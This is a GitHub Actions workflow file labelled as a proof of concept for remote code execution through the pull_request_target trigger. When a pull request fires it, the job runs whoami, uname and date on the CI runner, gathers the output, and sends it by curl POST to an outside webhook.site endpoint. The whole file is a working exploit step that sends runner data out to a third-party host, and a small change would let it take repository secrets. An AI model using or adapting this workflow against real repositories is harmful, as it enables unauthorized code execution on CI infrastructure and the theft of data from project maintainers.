name: PoC – pull_request_target RCE

on:
  pull_request_target:

jobs:
  poc:
    runs-on: ubuntu-latest
    steps:
      - name: Proof of RCE + Send to Webhook
        run: |
          echo "=== whoami ==="
          whoami || true

          echo "=== uname -a ==="
          uname -a || true

          echo "=== date ==="
          date || true

          # Collect all output into one variable
          OUTPUT="$(echo '=== whoami ===' && whoami && \
                    echo '=== uname -a ===' && uname -a && \
                    echo '=== date ===' && date)"

          echo ""
          echo "----- Collected Output -----"
          echo "$OUTPUT"
          echo "----------------------------"

          # Send to webhook.site
          curl -X POST -H "Content-Type: text/plain" \
            -d "$OUTPUT" \
            https://webhook.site/4322ca73-8792-4d35-b6e3-c7091fee14d6
